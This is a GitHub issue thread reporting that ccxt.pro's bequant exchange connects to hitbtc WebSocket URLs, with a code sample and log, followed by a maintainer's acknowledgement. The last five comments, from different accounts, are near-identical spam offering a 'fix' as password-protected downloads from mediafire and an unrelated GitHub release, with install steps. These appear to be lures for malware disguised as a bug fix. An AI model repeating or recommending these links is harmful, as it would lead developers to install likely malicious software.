### ISSUE TITLE
Bequant WS url wrong

### ISSUE THREAD

**Issue by varanauskas** [ccxt/ccxt#23283]
### Operating System

macOS

### Programming Languages

JavaScript

### CCXT Version

4.3.70

### Description

When trying to use CCXT.PRO with bequant exchange, it seems to use wrong WS url from hitbtc, rather than the ws url of bequant

### Code

```js
const ccxt = require('ccxt');
const exchange = new ccxt.pro.bequant();
console.log(exchange.describe().urls.api);
/* Note the hitbtc URLs returned in WS
{
  public: 'https://api.bequant.io/api/3',
  private: 'https://api.bequant.io/api/3',
  ws: {
    public: 'wss://api.hitbtc.com/api/3/ws/public',
    private: 'wss://api.hitbtc.com/api/3/ws/trading'
  }
}
*/
exchange.verbose = true;
exchange.loadMarkets().then(() => exchange.watchTicker('BTCUSDT').then(console.log));
/* When we try to watch a ticker, it uses the hitbtc URL
2024-08-01T06:11:30.959Z connecting to wss://api.hitbtc.com/api/3/ws/public
2024-08-01T06:11:31.597Z onUpgrade
2024-08-01T06:11:31.599Z onOpen
2024-08-01T06:11:31.599Z sending {
  method: 'subscribe',
  id: 1722492690957,
  ch: 'ticker/1s',
  params: { symbols: [ 'BTCUSDT' ] }
}
*/
```

**Comment by sc0Vu** [comment]
@varanauskas Thanks for the report. We'll fix this asap.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
